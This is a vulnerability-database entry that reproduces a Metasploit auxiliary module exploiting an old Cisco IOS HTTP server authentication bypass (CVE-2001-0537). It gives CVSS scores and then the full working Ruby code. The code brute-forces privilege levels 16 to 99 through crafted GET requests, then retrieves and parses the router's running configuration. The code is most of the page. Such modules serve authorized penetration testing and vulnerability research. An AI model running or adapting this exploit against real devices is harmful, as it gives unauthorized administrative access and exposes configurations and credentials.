Lucene search

K
metasploitAushack <[email protected]>, hdm <[email protected]>MSF:AUXILIARY-SCANNER-HTTP-CISCO_IOS_AUTH_BYPASS-
HistoryDec 10, 2010 - 5:47 a.m.

Cisco IOS HTTP Unauthorized Administrative Access

2010-12-1005:47:33
www.rapid7.com
26

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

This module exploits a vulnerability in the Cisco IOS HTTP Server. By sending a GET request for “/level/num/exec/…”, where num is between 16 and 99, it is possible to bypass authentication and obtain full system control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##



class MetasploitModule < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::HttpClient

  # Include Cisco utility methods
  include Msf::Auxiliary::Cisco

  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Cisco IOS HTTP Unauthorized Administrative Access',
      'Description'    => %q{
        This module exploits a vulnerability in the Cisco IOS HTTP Server.
        By sending a GET request for "/level/num/exec/..", where num is between
        16 and 99, it is possible to bypass authentication and obtain full system
        control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module
        tested successfully against a Cisco 1600 Router IOS v11.3(11d).
      },
      'Author'		=> [ 'aushack', 'hdm' ],
      'License'		=> MSF_LICENSE,
      'References'	=>
        [
          [ 'BID', '2936'],
          [ 'CVE', '2001-0537'],
          [ 'OSVDB', '578' ],
        ],
      'DisclosureDate' => '2001-06-27'))
  end

  def run_host(ip)

    16.upto(99) do |level|
      res = send_request_cgi({
        'uri'  		=>  "/level/#{level}/exec/show/version/CR",
        'method'   	=> 'GET'
      }, 20)

      if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
        print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")

        report_vuln(
          {
            :host	=> rhost,
            :port	=> rport,
            :proto  => 'tcp',
            :name	=> self.name,
            :sname  => ssl ? "https" : "http",
            :info	=> "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
            :refs   => self.references,
            :exploited_at => Time.now.utc
          }
        )

        res = send_request_cgi({
          'uri'  		=>  "/level/#{level}/exec/show/config/CR",
          'method'   	=> 'GET'
        }, 20)

        if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
          config = $2.strip
          print_good("#{rhost}:#{rport} Processing the configuration file...")
          cisco_ios_config_eater(rhost, rport, config)
          report_exploit(
            {
              :host		=> rhost,
              :port		=> rport,
              :name		=> self.name,
              :sname      => ssl ? "https" : "http",
              :info       => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"
            }
          )
        else
          print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
        end

        break
      end
    end
  end
end

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

Related for MSF:AUXILIARY-SCANNER-HTTP-CISCO_IOS_AUTH_BYPASS-